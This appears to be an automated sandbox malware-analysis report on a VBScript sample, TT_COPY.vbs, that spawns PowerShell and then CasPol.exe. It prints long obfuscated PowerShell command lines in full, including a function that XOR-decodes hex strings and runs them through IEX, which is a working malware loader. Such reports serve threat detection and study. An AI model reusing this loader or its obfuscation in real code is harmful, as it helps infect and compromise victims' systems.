Af`$TrDBreNolFoiSenFotCaeBrrduvPeaArlMulIneTrrFonSheHysSa[Re`$ReKOmlPaiDasTrtBurOritenVegDoeDirOp/Sw2Be]Em Gk=Lo Co[PocOnoSunTivUneMarKrtTa]Vi:tr:WiTReoRoBVgyEttWaeDe(Ma`$GrRWheFogTuiAnoNonBysDipLolDeaFonPrlUdoFovGrsUn.PaSFoucobDusBrtForCliMenTugli(Ja`$CeKMelIciAysAftMirGriCinUvgUneStrSe,Fu te2Ho)Ko,Sk Ba1Ti6Va)Fl;Ga Va Ar`$UnDSceKelPiirenFltpeeDorTevStaColFjlTrePerAcnOveDisLa[Ca`$AfKtalIdiKlsCotskrHyiUnnBrgsueAsrte/Mo2Pe]Le Zo=Mi Ne(ne`$PiDsleaulSuiFanmytFjeAnrFevTeaPrlnolKreLurFrnByeThsOb[Ek`$BaKUdltriOrsLatserOsiChnJegSkeThrSp/Er2Mu]Bi Be-prbmeximoForGr Es1Sk6St5Fr)De;Ar kn Gi An Ma}He Vn[ReSGatakrHaiSinLogOx]fi[TaSmoyCosHatPaeChmOr.unTAleAbxOvtFo.ExEkvnNocAaoMedStiHonAsgBo]No:Bi:TiADiSBeCGrILaIHu.raGCoeVitKoSVatprrUniLanSugHa(Ec`$MaDExeKvlFaiFlnBatEnePorssvFuaJalInlIneGorExnBieWhsAn)Eq;Pa}St`$RiFUpoKorsksInkMinVeiFanDugMesrerLieBrsOvuRelHotIdaUrtDieKtrDesfa0In=SiSHimUfecergotafePrnknsvibHeaHyrEknmissi0Fi Dr'MeFSv6AfDSnCfaDSu6SuDVe1InCHj0AfCUn8Da8UdBBvCMa1BaCre9VaCOr9Sa'Un;Al`$LiFodoKerHosLikConHuiTrnSpgDoslarSueEjsTeuTelVetBiaGrtReeOvransLe1Wa=OuSLumMoeUrrBrtUmeKanHyspobMuaWirInnAnsNo0Br No'UdEAn8KoCRuCUnCdo6TrDWo7cuCcuAFaDha6LyCDiAUnCNe3KrDCa1ma8FlBImFDi2DdCDyCSaCGrBSe9Am6Ch9Ok7Re8grBskFhu0ReCFiBMoDDi6NaCCo4SkCUn3HiCBr0KeETrBPoCSh4GrDRe1AnCBoCYnDSo3MiCAf0SaEUn8SaCTo0TiDCo1ScCZoDNoCFlAMeCut1KoDSe6Bo'Sq;Gr`$FiFDooStrnosKokIdnCoiblnSkgJosSprDaeTssTeuUnlSttSvaPrtHoeChrHysDi2Ny=PoSUmmPeeKnrqutCleHonidsFobFoaPrrUnnKosPo0Ra Ve'TrEPa2ImCRe0spDpr1VaFCa5TeDPa7lyCBrAHeCSi6DiEIr4VaCFr1DaCVa1UpDDu7TeCGy0hoDRe6UdDSu6De'Me;Ud`$GrFTeolerLusCukClnRaiSanHagcisCyrBeeDesVauSylFotSkaAntmueSarUdsEt3La=RaSStmEkeSkrSatHueSunTrsInbBeaHerRonFosKu0He Co'FrFRe6slDMeCFoDin6BeDOp1ToCBu0CoCUl8Gu8MeBUnFCo7OpDMo0MaCWeBJaDVi1plCJoCArCSh8BaCSt0nu8CoBMeEReCDiCFeBTaDLy1soCOm0EuDAf7ReCSuAtoDDh5brFVa6PsCIn0FeDDi7maDBa3KaCChCReCMe6FlCde0UiDHu6Re8ReBGeEseDBaCSp4KlCStBryCca1SkCfr9DaCke0EsFMi7UnCdu0PrCAs3hf'Gr;De`$PoFChoMirPesDikFlnIniBanovgSasMarKaeGrsBeuValFotFraTrtHieAlrStsKl4Da=FoSnomfjegorSvtGreBunKasLgbSparorUnnSosIn0Al Gr'JoDAd6enDSe1PeDch7DiCPrCAmCSyBFrCPi2Mu'Ra;We`$IrFBroLurSusCoktonFeiAnnNogTasMirpieLiscauTalExtKaaSptDoeunrSisIr5Do=OcSMimBaeStrRetLteSonFusUdbGraMurFonMosDr0M
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Vildmnd = """SaFLauConFacGatUniStoUnnLi suSSemLeeAurGltIneFrnAnsFrbAnaCarIrnPrsre0St To{Ch Ir Al Ud DopCoaSerUsaPemAn(Th[FoSRetHorKoiBonSagSu]In`$NoRAfenoguniHyoOpnMesHapFrlInathnStlVaoIsvUnsel)Bo;Hu In Po Fe Fo`$DiDOceWilMuiUnnPhtBaeHerJuvSyaNalPrlGaeTorKonIfeCosDi No=Br WhNBeetrwKo-FjOKobThjRaeLecCotUn BebStyEntCieKo[cu]Hu Cr(Hy`$mrRDreOagviiMyoBanTvsKvpEklOvaacnFrlSloHovsosPi.SuLAbeNenWagSmtHuhTh No/Be Ze2Co)St;Pe Sk Gt Mi SuFUdomerOm(cr`$ArKUblVaiOvsSetUnrEmiAznTeggeeUnrGu=Al0re;Un Tr`$SpKTjlDriMesAktSurFoiUnnCagMeeSarIc He-FalBrtKa Ac`$TiRWieUdgUdiDeoRanObsSkpRelMiaPrnAnlreoAlvInsfo.BoLTreFanPrgFrtSthDd;Uu Sp`$SyKFolGoiAlsExtinrTriLinUngSkeIcrRe+Fl=Zi2he)Le{Ga Ys Un Pa Pr Te Ta Il Af`$TrDBreNolFoiSenFotCaeBrrduvPeaArlMulIneTrrFonSheHysSa[Re`$ReKOmlPaiDasTrtBurOritenVegDoeDirOp/Sw2Be]Em Gk=Lo Co[PocOnoSunTivUneMarKrtTa]Vi:tr:WiTReoRoBVgyEttWaeDe(Ma`$GrRWheFogTuiAnoNonBysDipLolDeaFonPrlUdoFovGrsUn.PaSFoucobDusBrtForCliMenTugli(Ja`$CeKMelIciAysAftMirGriCinUvgUneStrSe,Fu te2Ho)Ko,Sk Ba1Ti6Va)Fl;Ga Va Ar`$UnDSceKelPiirenFltpeeDorTevStaColFjlTrePerAcnOveDisLa[Ca`$AfKtalIdiKlsCotskrHyiUnnBrgsueAsrte/Mo2Pe]Le Zo=Mi Ne(ne`$PiDsleaulSuiFanmytFjeAnrFevTeaPrlnolKreLurFrnByeThsOb[Ek`$BaKUdltriOrsLatserOsiChnJegSkeThrSp/Er2Mu]Bi Be-prbmeximoForGr Es1Sk6St5Fr)De;Ar kn Gi An Ma}He Vn[ReSGatakrHaiSinLogOx]fi[TaSmoyCosHatPaeChmOr.unTAleAbxOvtFo.ExEkvnNocAaoMedStiHonAsgBo]No:Bi:TiADiSBeCGrILaIHu.raGCoeVitKoSVatprrUniLanSugHa(Ec`$MaDExeKvlFaiFlnBatEnePorssvFuaJalInlIneGorExnBieWhsAn)Eq;Pa}St`$RiFUpoKorsksInkMinVeiFanDugMesrerLieBrsOvuRelHotIdaUrtDieKtrDesfa0In=SiSHimUfecergotafePrnknsvibHeaHyrEknmissi0Fi Dr'MeFSv6AfDSnCfaDSu6SuDVe1InCHj0AfCUn8Da8UdBBvCMa1BaCre9VaCOr9Sa'Un;Al`$LiFodoKerHosLikConHuiTrnSpgDoslarSueEjsTeuTelVetBiaGrtReeOvransLe1Wa=OuSLumMoeUrrBrtUmeKanHyspobMuaWirInnAnsNo0Br No'UdEAn8KoCRuCUnCdo6TrDWo7cuCcuAFaDha6LyCDiAUnCNe3KrDCa1ma8FlBImFDi2DdCDyCSaCGrBSe9Am6Ch9Ok7Re8grBskFhu0ReCFiBMoDDi6NaCCo4SkCUn3HiCBr0KeETrBPoCSh4GrDRe1AnCBoCYnDSo3MiCAf0SaEUn8SaCTo0TiDCo1ScCZoDNoCFlAMeCut1KoDSe6Bo'Sq;Gr`$FiFDooStrnosKokIdnCoiblnSkgJosSprDaeTssTeuUnlSttSvaPrtHoeChrHysDi2Ny=PoSUmmPeeKnrqutCleHonidsFobFoaPrrUnnKosPo0Ra Ve'TrEPa2ImCRe0spDpr1VaFCa5TeDPa7lyCBrAHeCSi6DiEIr4VaCFr1DaCVa1UpDDu7TeCGy0hoDRe6UdDSu6De'Me;Ud`$GrFTeolerLusCukClnRaiSanHagcisCyrBeeDesVauSylFotSkaAntmueSarUdsEt3La=RaSStmEkeSkrSatHueSunTrsInbBeaHerRonFosKu0He Co'FrFRe6slDMeCFoDin6BeDOp1ToCBu0CoCUl8Gu8MeBUnFCo7OpDMo0MaCWeBJaDVi1plCJoCArCSh8BaCSt0nu8CoBMeEReCDiCFeBTaDLy1soCOm0EuDAf7ReCSuAtoDDh5brFVa6PsCIn0FeDDi7maDBa3KaCChCReCMe6FlCde0UiDHu6Re8ReBGeEseDBaCSp4KlCStBryCca1SkCfr9DaCke0EsFMi7UnCdu0PrCAs3hf'Gr;De`$PoFChoMirPesDikFlnIniBanovgSasMarKaeGrsBeuValFotFraTrtHieAlrStsKl4Da=FoSnomfjegorSvtGreBunKasLgbSparorUnnSosIn0Al Gr'JoDAd6enDSe1PeDch7DiCPrCAmCSyBFrCPi2Mu'Ra;We`$IrFBroLurSusCoktonFeiAnnNogTasMirpieLiscauTalExtKaaSptDoeunrSisIr5Do=OcSMimBaeStrRetLteSonFusUdbGraMurFonMosDr0M
          Source: Initial file: Impi11.ShellExecute Skyler, " " & chrw(34) + Ce8 + chrw(34), "", "", 0
          Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 21279
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 6954
          Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 21279
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 6954
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 7_2_00CC4280
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 7_2_00CC1960
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 7_2_00CD5C38
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 7_2_00CD79E0
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 7_2_00CD5128
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 7_2_00CDB930
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 7_2_00CDDEC8
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 7_2_00CDDA77
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 7_2_00CDC323
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 7_2_00CD4500
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 7_2_00DAC180
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 7_2_1F824FA0
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 7_2_1F82D720
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 7_2_1F827AE0
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 7_2_1D45AFDA NtQuerySystemInformation,
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 7_2_1D45AFB8 NtQuerySystemInformation,
          Source: TT_COPY.vbsInitial sample: Strings found which are bigger than 50
          Source: C:\Windows\System32\wscript.exeSection loaded: edgegdi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edgegdi.dll
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeSection loaded: edgegdi.dll
          Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\TT_COPY.vbs"
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Vildmnd = """SaFLauConFacGatUniStoUnnLi suSSemLeeAurGltIneFrnAnsFrbAnaCarIrnPrsre0St To{Ch Ir Al Ud DopCoaSerUsaPemAn(Th[FoSRetHorKoiBonSagSu]In`$NoRAfenoguniHyoOpnMesHapFrlInathnStlVaoIsvUnsel)Bo;Hu In Po Fe Fo`$DiDOceWilMuiUnnPhtBaeHerJuvSyaNalPrlGaeTorKonIfeCosDi No=Br WhNBeetrwKo-FjOKobThjRaeLecCotUn BebStyEntCieKo[cu]Hu Cr(Hy`$mrRDreOagviiMyoBanTvsKvpEklOvaacnFrlSloHovsosPi.SuLAbeNenWagSmtHuhTh No/Be Ze2Co)St;Pe Sk Gt Mi SuFUdomerOm(cr`$ArKUblVaiOvsSetUnrEmiAznTeggeeUnrGu=Al0re;Un Tr`$SpKTjlDriMesAktSurFoiUnnCagMeeSarIc He-FalBrtKa Ac`$TiRWieUdgUdiDeoRanObsSkpRelMiaPrnAnlreoAlvInsfo.BoLTreFanPrgFrtSthDd;Uu Sp`$SyKFolGoiAlsExtinrTriLinUngSkeIcrRe+Fl=Zi2he)Le{Ga Ys Un Pa Pr Te Ta Il Af`$TrDBreNolFoiSenFotCaeBrrduvPeaArlMulIneTrrFonSheHysSa[Re`$ReKOmlPaiDasTrtBurOritenVegDoeDirOp/Sw2Be]Em Gk=Lo Co[PocOnoSunTivUneMarKrtTa]Vi:tr:WiTReoRoBVgyEttWaeDe(Ma`$GrRWheFogTuiAnoNonBysDipLolDeaFonPrlUdoFovGrsUn.PaSFoucobDusBrtForCliMenTugli(Ja`$CeKMelIciAysAftMirGriCinUvgUneStrSe,Fu te2Ho)Ko,Sk Ba1Ti6Va)Fl;Ga Va Ar`$UnDSceKelPiirenFltpeeDorTevStaColFjlTrePerAcnOveDisLa[Ca`$AfKtalIdiKlsCotskrHyiUnnBrgsueAsrte/Mo2Pe]Le Zo=Mi Ne(ne`$PiDsleaulSuiFanmytFjeAnrFevTeaPrlnolKreLurFrnByeThsOb[Ek`$BaKUdltriOrsLatserOsiChnJegSkeThrSp/Er2Mu]Bi Be-prbmeximoForGr Es1Sk6St5Fr)De;Ar kn Gi An Ma}He Vn[ReSGatakrHaiSinLogOx]fi[TaSmoyCosHatPaeChmOr.unTAleAbxOvtFo.ExEkvnNocAaoMedStiHonAsgBo]No:Bi:TiADiSBeCGrILaIHu.raGCoeVitKoSVatprrUniLanSugHa(Ec`$MaDExeKvlFaiFlnBatEnePorssvFuaJalInlIneGorExnBieWhsAn)Eq;Pa}St`$RiFUpoKorsksInkMinVeiFanDugMesrerLieBrsOvuRelHotIdaUrtDieKtrDesfa0In=SiSHimUfecergotafePrnknsvibHeaHyrEknmissi0Fi Dr'MeFSv6AfDSnCfaDSu6SuDVe1InCHj0AfCUn8Da8UdBBvCMa1BaCre9VaCOr9Sa'Un;Al`$LiFodoKerHosLikConHuiTrnSpgDoslarSueEjsTeuTelVetBiaGrtReeOvransLe1Wa=OuSLumMoeUrrBrtUmeKanHyspobMuaWirInnAnsNo0Br No'UdEAn8KoCRuCUnCdo6TrDWo7cuCcuAFaDha6LyCDiAUnCNe3KrDCa1ma8FlBImFDi2DdCDyCSaCGrBSe9Am6Ch9Ok7Re8grBskFhu0ReCFiBMoDDi6NaCCo4SkCUn3HiCBr0KeETrBPoCSh4GrDRe1AnCBoCYnDSo3MiCAf0SaEUn8SaCTo0TiDCo1ScCZoDNoCFlAMeCut1KoDSe6Bo'Sq;Gr`$FiFDooStrnosKokIdnCoiblnSkgJosSprDaeTssTeuUnlSttSvaPrtHoeChrHysDi2Ny=PoSUmmPeeKnrqutCleHonidsFobFoaPrrUnnKosPo0Ra Ve'TrEPa2ImCRe0spDpr1VaFCa5TeDPa7lyCBrAHeCSi6DiEIr4VaCFr1DaCVa1UpDDu7TeCGy0hoDRe6UdDSu6De'Me;Ud`$GrFTeolerLusCukClnRaiSanHagcisCyrBeeDesVauSylFotSkaAntmueSarUdsEt3La=RaSStmEkeSkrSatHueSunTrsInbBeaHerRonFosKu0He Co'FrFRe6slDMeCFoDin6BeDOp1ToCBu0CoCUl8Gu8MeBUnFCo7OpDMo0MaCWeBJaDVi1plCJoCArCSh8BaCSt0nu8CoBMeEReCDiCFeBTaDLy1soCOm0EuDAf7ReCSuAtoDDh5brFVa6PsCIn0FeDDi7maDBa3KaCChCReCMe6FlCde0UiDHu6Re8ReBGeEseDBaCSp4KlCStBryCca1SkCfr9DaCke0EsFMi7UnCdu0PrCAs3hf'Gr;De`$PoFChoMirPesDikFlnIniBanovgSasMarKaeGrsBeuValFotFraTrtHieAlrStsKl4Da=FoSnomfjegorSvtGreBunKasLgbSparorUnnSosIn0Al Gr'JoDAd6enDSe1PeDch7DiCPrCAmCSyBFrCPi2Mu'Ra;We`$IrFBroLurSusCoktonFeiAnnNogTasMirpieLiscauTalExtKaaSptDoeunrSisIr5Do=OcSMimBaeStrRetLteSonFusUdbGraMurFonMosDr0M
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "Function Smertensbarns0 { param([String]$Regionsplanlovs); $Delintervallernes = New-Object byte[] ($Regionsplanlovs.Length / 2); For($Klistringer=0; $Klistringer -lt $Regionsplanlovs.Length; $Klistringer+=2){ $Delintervallernes[$Klistringer/2] = [convert]::ToByte($Regionsplanlovs.Substring($Klistringer, 2), 16); $Delintervallernes[$Klistringer/2] = ($Delintervallernes[$Klistringer/2] -bxor 165); } [String][System.Text.Encoding]::ASCII.GetString($Delintervallernes);}$Forskningsresultaters0=Smertensbarns0 'F6DCD6D1C0C88BC1C9C9';$Forskningsresultaters1=Smertensbarns0 'E8CCC6D7CAD6CAC3D18BF2CCCB96978BF0CBD6C4C3C0EBC4D1CCD3C0E8C0D1CDCAC1D6';$Forskningsresultaters2=Smertensbarns0 'E2C0D1F5D7CAC6E4C1C1D7C0D6D6';$Forskningsresultaters3=Smertensbarns0 'F6DCD6D1C0C88BF7D0CBD1CCC8C08BECCBD1C0D7CAD5F6C0D7D3CCC6C0D68BEDC4CBC1C9C0F7C0C3';$Forskningsresultaters4=Smertensbarns0 'D6D1D7CCCBC2';$Forskningsresultaters5=Smertensbarns0 'E2C0D1E8CAC1D0C9C0EDC4CBC1C9C0';$Forskningsresultaters6=Smertensbarns0 'F7F1F6D5C0C6CCC4C9EBC4C8C08985EDCCC1C0E7DCF6CCC28985F5D0C7C9CCC6';$Forskningsresultaters7=Smertensbarns0 'F7D0CBD1CCC8C08985E8C4CBC4C2C0C1';$Forskningsresultaters8=Smertensbarns0 'F7C0C3C9C0C6D1C0C1E1C0C9C0C2C4D1C0';$Forskningsresultaters9=Smertensbarns0 'ECCBE8C0C8CAD7DCE8CAC1D0C9C0';$Ghegish0=Smertensbarns0 'E8DCE1C0C9C0C2C4D1C0F1DCD5C0';$Ghegish1=Smertensbarns0 'E6C9C4D6D68985F5D0C7C9CCC68985F6C0C4C9C0C18985E4CBD6CCE6C9C4D6D68985E4D0D1CAE6C9C4D6D6';$Ghegish2=Smertensbarns0 'ECCBD3CACEC0';$Ghegish3=Smertensbarns0 'F5D0C7C9CCC68985EDCCC1C0E7DCF6CCC28985EBC0D2F6C9CAD18985F3CCD7D1D0C4C9';$Ghegish4=Smertensbarns0 'F3CCD7D1D0C4C9E4C9C9CAC6';$Ghegish5=Smertensbarns0 'CBD1C1C9C9';$Ghegish6=Smertensbarns0 'EBD1F5D7CAD1C0C6D1F3CCD7D1D0C4C9E8C0C8CAD7DC';$Ghegish7=Smertensbarns0 'ECE0FD';$Ghegish8=Smertensbarns0 'F9';function fkp {Param ($Upgrown, $Depressionsperioder) ;$Hoeres0 =Smertensbarns0 '81EED7C8C8C0D7C0CB8598858DFEE4D5D5E1CAC8C4CCCBF89F9FE6D0D7D7C0CBD1E1CAC8C4CCCB8BE2C0D1E4D6D6C0C8C7C9CCC0D68D8C85D985F2CDC0D7C088EAC7CFC0C6D185DE8581FA8BE2C9CAC7C4C9E4D6D6C0C8C7C9DCE6C4C6CDC08588E4CBC18581FA8BE9CAC6C4D1CCCACB8BF6D5C9CCD18D81E2CDC0C2CCD6CD9D8CFE8894F88BE0D4D0C4C9D68D81E3CAD7D6CECBCCCBC2D6D7C0D6D0C9D1C4D1C0D7D6958C85D88C8BE2C0D1F1DCD5C08D81E3CAD7D6CECBCCCBC2D6D7C0D6D0C9D1C4D1C0D7D6948C';&($Ghegish7) $Hoeres0;$Hoeres5 = Smertensbarns0 '81E6CDCCC9C985988581EED7C8C8C0D7C0CB8BE2C0D1E8C0D1CDCAC18D81E3CAD7D6CECBCCCBC2D6D7C0D6D0C9D1C4D1C0D7D6978985FEF1DCD5C0FEF8F885E58D81E3CAD7D6CECBCCCBC2D6D7C0D6D0C9D1C4D1C0D7D696898581E3CAD7D6CECBCCCBC2D6D7C0D6D0C9D1C4D1C0D7D6918C8C';&($Ghegish7) $Hoeres5;$Hoeres1 = Smertensbarns0 'D7C0D1D0D7CB8581E6CDCCC9C98BECCBD3CACEC08D81CBD0C9C98985E58DFEF6DCD6D1C0C88BF7D0CBD1CCC8C08BECCBD1C0D7CAD5F6C0D7D3CCC6C0D68BEDC4CBC1C9C0F7C0C3F88DEBC0D288EAC7CFC0C6D185F6DCD6D1C0C88BF7D0CBD1CCC8C08BECCBD1C0D7CAD5F6C0D7D3CC
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\caspol.exe
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Vildmnd = """SaFLauConFacGatUniStoUnnLi suSSemLeeAurGltIneFrnAnsFrbAnaCarIrnPrsre0St To{Ch Ir Al Ud DopCoaSerUsaPemAn(Th[FoSRetHorKoiBonSagSu]In`$NoRAfenoguniHyoOpnMesHapFrlInathnStlVaoIsvUnsel)Bo;Hu In Po Fe Fo`$DiDOceWilMuiUnnPhtBaeHerJuvSyaNalPrlGaeTorKonIfeCosDi No=Br WhNBeetrwKo-FjOKobThjRaeLecCotUn BebStyEntCieKo[cu]Hu Cr(Hy`$mrRDreOagviiMyoBanTvsKvpEklOvaacnFrlSloHovsosPi.SuLAbeNenWagSmtHuhTh No/Be Ze2Co)St;Pe Sk Gt Mi SuFUdomerOm(cr`$ArKUblVaiOvsSetUnrEmiAznTeggeeUnrGu=Al0re;Un Tr`$SpKTjlDriMesAktSurFoiUnnCagMeeSarIc He-FalBrtKa Ac`$TiRWieUdgUdiDeoRanObsSkpRelMiaPrnAnlreoAlvInsfo.BoLTreFanPrgFrtSthDd;Uu Sp`$SyKFolGoiAlsExtinrTriLinUngSkeIcrRe+Fl=Zi2he)Le{Ga Ys Un Pa Pr Te Ta Il Af`$TrDBreNolFoiSenFotCaeBrrduvPeaArlMulIneTrrFonSheHysSa[Re`$ReKOmlPaiDasTrtBurOritenVegDoeDirOp/Sw2Be]Em Gk=Lo Co[PocOnoSunTivUneMarKrtTa]Vi:tr:WiTReoRoBVgyEttWaeDe(Ma`$GrRWheFogTuiAnoNonBysDipLolDeaFonPrlUdoFovGrsUn.PaSFoucobDusBrtForCliMenTugli(Ja`$CeKMelIciAysAftMirGriCinUvgUneStrSe,Fu te2Ho)Ko,Sk Ba1Ti6Va)Fl;Ga Va Ar`$UnDSceKelPiirenFltpeeDorTevStaColFjlTrePerAcnOveDisLa[Ca`$AfKtalIdiKlsCotskrHyiUnnBrgsueAsrte/Mo2Pe]Le Zo=Mi Ne(ne`$PiDsleaulSuiFanmytFjeAnrFevTeaPrlnolKreLurFrnByeThsOb[Ek`$BaKUdltriOrsLatserOsiChnJegSkeThrSp/Er2Mu]Bi Be-prbmeximoForGr Es1Sk6St5Fr)De;Ar kn Gi An Ma}He Vn[ReSGatakrHaiSinLogOx]fi[TaSmoyCosHatPaeChmOr.unTAleAbxOvtFo.ExEkvnNocAaoMedStiHonAsgBo]No:Bi:TiADiSBeCGrILaIHu.raGCoeVitKoSVatprrUniLanSugHa(Ec`$MaDExeKvlFaiFlnBatEnePorssvFuaJalInlIneGorExnBieWhsAn)Eq;Pa}St`$RiFUpoKorsksInkMinVeiFanDugMesrerLieBrsOvuRelHotIdaUrtDieKtrDesfa0In=SiSHimUfecergotafePrnknsvibHeaHyrEknmissi0Fi Dr'MeFSv6AfDSnCfaDSu6SuDVe1InCHj0AfCUn8Da8UdBBvCMa1BaCre9VaCOr9Sa'Un;Al`$LiFodoKerHosLikConHuiTrnSpgDoslarSueEjsTeuTelVetBiaGrtReeOvransLe1Wa=OuSLumMoeUrrBrtUmeKanHyspobMuaWirInnAnsNo0Br No'UdEAn8KoCRuCUnCdo6TrDWo7cuCcuAFaDha6LyCDiAUnCNe3KrDCa1ma8FlBImFDi2DdCDyCSaCGrBSe9Am6Ch9Ok7Re8grBskFhu0ReCFiBMoDDi6NaCCo4SkCUn3HiCBr0KeETrBPoCSh4GrDRe1AnCBoCYnDSo3MiCAf0SaEUn8SaCTo0TiDCo1ScCZoDNoCFlAMeCut1KoDSe6Bo'Sq;Gr`$FiFDooStrnosKokIdnCoiblnSkgJosSprDaeTssTeuUnlSttSvaPrtHoeChrHysDi2Ny=PoSUmmPeeKnrqutCleHonidsFobFoaPrrUnnKosPo0Ra Ve'TrEPa2ImCRe0spDpr1VaFCa5TeDPa7lyCBrAHeCSi6DiEIr4VaCFr1DaCVa1UpDDu7TeCGy0hoDRe6UdDSu6De'Me;Ud`$GrFTeolerLusCukClnRaiSanHagcisCyrBeeDesVauSylFotSkaAntmueSarUdsEt3La=RaSStmEkeSkrSatHueSunTrsInbBeaHerRonFosKu0He Co'FrFRe6slDMeCFoDin6BeDOp1ToCBu0CoCUl8Gu8MeBUnFCo7OpDMo0MaCWeBJaDVi1plCJoCArCSh8BaCSt0nu8CoBMeEReCDiCFeBTaDLy1soCOm0EuDAf7ReCSuAtoDDh5brFVa6PsCIn0FeDDi7maDBa3KaCChCReCMe6FlCde0UiDHu6Re8ReBGeEseDBaCSp4KlCStBryCca1SkCfr9DaCke0EsFMi7UnCdu0PrCAs3hf'Gr;De`$PoFChoMirPesDikFlnIniBanovgSasMarKaeGrsBeuValFotFraTrtHieAlrStsKl4Da=FoSnomfjegorSvtGreBunKasLgbSparorUnnSosIn0Al Gr'JoDAd6enDSe1PeDch7DiCPrCAmCSyBFrCPi2Mu'Ra;We`$IrFBroLurSusCoktonFeiAnnNogTasMirpieLiscauTalExtKaaSptDoeunrSisIr5Do=OcSMimBaeStrRetLteSonFusUdbGraMurFonMosDr0M
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "Function Smertensbarns0 { param([String]$Regionsplanlovs); $Delintervallernes = New-Object byte[] ($Regionsplanlovs.Length / 2); For($Klistringer=0; $Klistringer -lt $Regionsplanlovs.Length; $Klistringer+=2){ $Delintervallernes[$Klistringer/2] = [convert]::ToByte($Regionsplanlovs.Substring($Klistringer, 2), 16); $Delintervallernes[$Klistringer/2] = ($Delintervallernes[$Klistringer/2] -bxor 165); } [String][System.Text.Encoding]::ASCII.GetString($Delintervallernes);}$Forskningsresultaters0=Smertensbarns0 'F6DCD6D1C0C88BC1C9C9';$Forskningsresultaters1=Smertensbarns0 'E8CCC6D7CAD6CAC3D18BF2CCCB96978BF0CBD6C4C3C0EBC4D1CCD3C0E8C0D1CDCAC1D6';$Forskningsresultaters2=Smertensbarns0 'E2C0D1F5D7CAC6E4C1C1D7C0D6D6';$Forskningsresultaters3=Smertensbarns0 'F6DCD6D1C0C88BF7D0CBD1CCC8C08BECCBD1C0D7CAD5F6C0D7D3CCC6C0D68BEDC4CBC1C9C0F7C0C3';$Forskningsresultaters4=Smertensbarns0 'D6D1D7CCCBC2';$Forskningsresultaters5=Smertensbarns0 'E2C0D1E8CAC1D0C9C0EDC4CBC1C9C0';$Forskningsresultaters6=Smertensbarns0 'F7F1F6D5C0C6CCC4C9EBC4C8C08985EDCCC1C0E7DCF6CCC28985F5D0C7C9CCC6';$Forskningsresultaters7=Smertensbarns0 'F7D0CBD1CCC8C08985E8C4CBC4C2C0C1';$Forskningsresultaters8=Smertensbarns0 'F7C0C3C9C0C6D1C0C1E1C0C9C0C2C4D1C0';$Forskningsresultaters9=Smertensbarns0 'ECCBE8C0C8CAD7DCE8CAC1D0C9C0';$Ghegish0=Smertensbarns0 'E8DCE1C0C9C0C2C4D1C0F1DCD5C0';$Ghegish1=Smertensbarns0 'E6C9C4D6D68985F5D0C7C9CCC68985F6C0C4C9C0C18985E4CBD6CCE6C9C4D6D68985E4D0D1CAE6C9C4D6D6';$Ghegish2=Smertensbarns0 'ECCBD3CACEC0';$Ghegish3=Smertensbarns0 'F5D0C7C9CCC68985EDCCC1C0E7DCF6CCC28985EBC0D2F6C9CAD18985F3CCD7D1D0C4C9';$Ghegish4=Smertensbarns0 'F3CCD7D1D0C4C9E4C9C9CAC6';$Ghegish5=Smertensbarns0 'CBD1C1C9C9';$Ghegish6=Smertensbarns0 'EBD1F5D7CAD1C0C6D1F3CCD7D1D0C4C9E8C0C8CAD7DC';$Ghegish7=Smertensbarns0 'ECE0FD';$Ghegish8=Smertensbarns0 'F9';function fkp 